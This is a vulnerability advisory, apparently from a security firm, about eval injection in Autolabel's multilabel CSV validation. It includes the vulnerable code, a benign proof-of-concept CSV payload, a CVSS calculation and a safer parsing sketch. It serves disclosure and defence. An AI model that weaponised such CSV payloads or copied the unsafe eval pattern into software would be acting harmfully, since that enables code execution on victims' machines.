Eval on CSV data allows arbitrary code execution in the MLCTaskValidate class
September 12, 2024

Products Impacted
This vulnerability is present in Autolabel v0.0.8 and newer.
CVSS Score: 7.8
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
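As a cross-check, the vector above can be scored by hand. The sketch below assumes the vector is a CVSS v3.1 base vector (the advisory does not state the version) and only handles Scope: Unchanged. The metric weights and the rounding rule come from the CVSS v3.1 specification; the function names are illustrative.

```python
import math

# CVSS v3.1 base metric weights (Scope: Unchanged values for PR).
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR = {"N": 0.85, "L": 0.62, "H": 0.27}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(x: float) -> float:
    """Round up to one decimal place, as defined in the v3.1 specification."""
    i = round(x * 100000)
    if i % 10000 == 0:
        return i / 100000.0
    return (math.floor(i / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a vector with Scope: Unchanged."""
    m = dict(part.split(":") for part in vector.split("/"))
    if m["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    impact = 6.42 * iss
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * PR[m["PR"]] * UI[m["UI"]]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


score = base_score("AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H")
print(score)  # 7.8
```

Under that assumption the result matches the published score: local attack vector and required user interaction (the victim must load the file) lower exploitability, while the high confidentiality, integrity, and availability impacts reflect full code execution.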
CWE Categorization
CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’)
Details
To exploit this vulnerability, an attacker creates a malicious CSV file and shares it with a victim, who loads it as the dataset for a multilabel classification task in Autolabel. The vulnerability is in the validate function of the MLCTaskValidate class in the autolabel/src/autolabel/dataset/validation.py Python file:
    def validate(self, value: str):
        if value.startswith("[") and value.endswith("]"):
            try:
                seed_labels = eval(value)
                if not isinstance(seed_labels, list):
                    raise ValueError(
                        f"value: '{value}' is not a list of labels as expected"
                    )
                unmatched_label = set(seed_labels) - self.labels_set
                if len(unmatched_label) != 0:
                    raise ValueError(
                        f"labels: '{unmatched_label}' not in prompt/labels provided in config "
                    )
            except SyntaxError:
                raise
        else:
            # TODO: split by delimiter specified in config and validate each label
            pass

When the user loads the malicious CSV file, the label_column value of each row is passed to the validate function of the validation class selected by the task_type attribute. For a multilabel classification task that class is MLCTaskValidate, and any value wrapped in brackets “[]” is passed directly to eval. This allows arbitrary code execution on the victim’s device. An example configuration and an example of a malicious CSV are shown below:
from autolabel import AutolabelDataset

config = {
    "task_name": "ToxicCommentClassification",
    "task_type": "multilabel_classification",  # classification task
    "dataset": {
        "label_column": "label",
    },
    "model": {
        "provider": "openai",
        "name": "gpt-3.5-turbo"  # the model we want to use
    },
    "prompt": {
        # very simple instructions for the LLM
        "task_guidelines": "Does the provided comment contain 'toxic' language? Say toxic or not toxic.",
        "labels": [  # list of labels to choose from
            "label",
            "not toxic"
        ],
        "example_template": "Text Snippet: {example}\nClassification: {label}\n{label}"
    }
}

AutolabelDataset('example.csv', config, validate=True)

example_config.py
example,label
hello,[print('\n\n\ncode execution\n\n\n') for a in ['a']]

example.csv
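The sketch below illustrates why the bracket check offers no protection: a list comprehension begins with "[" and ends with "]", so it reaches eval and runs. It uses a harmless stand-in payload that appends to a list instead of printing. The helper names (passes_bracket_check, parse_labels_safely) are hypothetical and not part of Autolabel, and the ast.literal_eval variant is one possible hardening under that assumption, not the vendor's fix.

```python
import ast


def passes_bracket_check(value: str) -> bool:
    """Mirror the only gate the vulnerable validate() applies before eval()."""
    return value.startswith("[") and value.endswith("]")


def parse_labels_safely(value: str) -> list:
    """Hypothetical alternative to eval(): accept only a literal list of strings."""
    try:
        parsed = ast.literal_eval(value)  # evaluates literals only, never calls code
    except (ValueError, SyntaxError, TypeError) as exc:
        raise ValueError(f"value: '{value}' is not a list of labels as expected") from exc
    if not isinstance(parsed, list) or not all(isinstance(x, str) for x in parsed):
        raise ValueError(f"value: '{value}' is not a list of labels as expected")
    return parsed


# Harmless stand-in for the advisory's payload: it records a side effect.
side_effects = []
payload = "[log.append('code ran') for a in ['a']]"

gate_passed = passes_bracket_check(payload)        # the comprehension looks like a list
evaluated = eval(payload, {"log": side_effects})   # what the vulnerable code path does

try:
    parse_labels_safely(payload)
    rejected = False
except ValueError:
    rejected = True

print(gate_passed, side_effects, rejected)
```

Note that eval returns a genuine list here, so the isinstance check in validate also passes. The later label-set comparison would raise a ValueError, but only after the attacker's expression has already run.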
Timeline
July 8, 2024: Reached out to multiple administrators through their communication channel
September 6, 2024: Final attempt to reach out to vendor prior to public disclosure date
September 12, 2024: Public disclosure
Project URL
https://github.com/refuel-ai/autolabel
Researcher: Leo Ring, Security Research Intern, HiddenLayer
Researcher: Kasimir Schulz, Principal Security Researcher, HiddenLayer